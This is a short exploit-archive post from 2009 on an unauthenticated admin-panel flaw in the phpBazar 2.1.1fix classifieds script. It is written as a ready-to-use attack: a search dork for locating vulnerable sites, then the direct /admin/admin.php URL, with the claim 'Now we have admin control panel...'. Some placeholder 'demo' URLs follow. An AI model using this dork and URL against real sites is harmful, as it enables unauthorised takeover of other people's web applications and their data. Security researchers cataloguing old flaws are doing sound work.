id: 10019
date: 11/25/2009
title: phpBazar 2.1.1fix Remote Administration-Panel Vulnerability
author: kurdish
cves: 

===========================================================
phpBazar-2.1.1fix Remote Administration-Panel Vulnerability
===========================================================


=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
 
<<->> script: phpBazar-2.1.1fix
 
<<->> download script ::
 http://www.smartisoft.com/products.php?product=phpbazar
 
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> Dork:phpBazar Ver. 2.1.0
 
 
 
<<->> Exploit ::
 
>>> http://server/path/admin/admin.php
 
Now we have admin control panel...
 
<<->> Demo :
 
http://server/ll/phpBazar-2.1.1fix/admin/admin.php
 
http://server/admin/admin.php
 
=======================================================
 
=======================================================



#  0day.today [2023-03-23]  #